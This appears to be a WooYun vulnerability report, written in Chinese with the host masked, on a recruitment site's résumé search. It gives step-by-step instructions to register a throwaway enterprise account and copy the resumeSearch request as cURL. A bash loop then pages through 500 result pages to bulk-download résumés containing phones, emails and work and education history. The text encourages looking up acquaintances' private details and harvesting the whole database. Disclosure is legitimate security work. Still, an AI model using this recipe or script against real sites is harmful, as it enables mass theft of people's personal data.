WooYun.org

Step 01～03 打开网站并注册登录。网址是http://**.**.**.**（可能.com的域名是不是新版网站）。注册时要选择“我有坑”注册企业账号才能搜索简历，资料可以乱填，只需要手机接收验证码。
这是首页

这是注册页面

这是注册登陆后的主页，注意点击搜索框进入搜索页面。

Step 04 搜索简历。关键词可以是上海，北京，C++，行政等等。
这是搜索页面，注意我们其实只需要一个可以接收验证码的手机就可以随意搜索别人的简历了，完全不需要专业知识。比如你想知道某个同学这几年在哪混，某个同事期望薪资多少，某个上司的学历和过往背景，花个几分钟搜索就可以了解。如果你的简历不幸在这几十万份之中，即使将来修正了漏洞，只要他们商业模式不改变，隐私仍然会像这样被泄漏。

Step 05 查看数据包。在step 04的搜索页面打开Chrome的开发者工具，切换到network tab，然后进行一次搜索。

图上这个resumeSearch就是问题的关键。双击可以看到具体信息。

这是数据包的头部和form data。注意有curPage和pageSize。
Step 06 查看数据包返回的信息。开发者工具从Headers tab切换到Preview tab。

从上图可以看到，执行搜索的时候返回了总人数和总页数，以及这一分页上的简历信息（默认10条一页）。

上面两张图是简历信息的具体内容，包括电话、邮箱、过往工作经历、教育经历、姓（没有名）、性别以及其它信息。这些简历似乎是从其他网站下载后导入的，字段很多，有些人填得更全，有些人缺失信息比较多。
Step 07 导出cURL。在开发者工具的resumeSearch上右击，选择Copy as cURL。这个导出的直接是CURL命令，可以在命令行直接粘贴执行，执行的输出就是10条简历信息。

Step 08 修改cURL，实现批量查询。这个方法多了，我就随便贴一下（把cookie等替换掉即可）。

for ((i=1;i<=500;i++))
do
 echo "curl -o hangzhouPage"$i".txt 'http://**.**.**.**/EnterpriseController/resumeSearch' -H '这里替换成你自己的内容\"' -H 'Origin: http://**.**.**.**' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Referer: http://**.**.**.**/enterprise/resumeSearchMore.html' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' --data 'curPage="$i"&pageSize=10&autoRender=false&keyWord=&currentPlace=&excepPlace=替换成你的地方&from=&to=&degree=0&ageFrom=&ageTo=&sex=0' --compressed";
  echo sleep 1
done

似乎只能获取搜索结果前500页的内容。我试过直接在网页上翻页只能翻500页。但是500页就有5000份简历，通过不同关键词组合搜索，花点时间应该可以把这几十万份简历全部弄下来。
最后是一小段下载下来的简历，做过模糊处理了。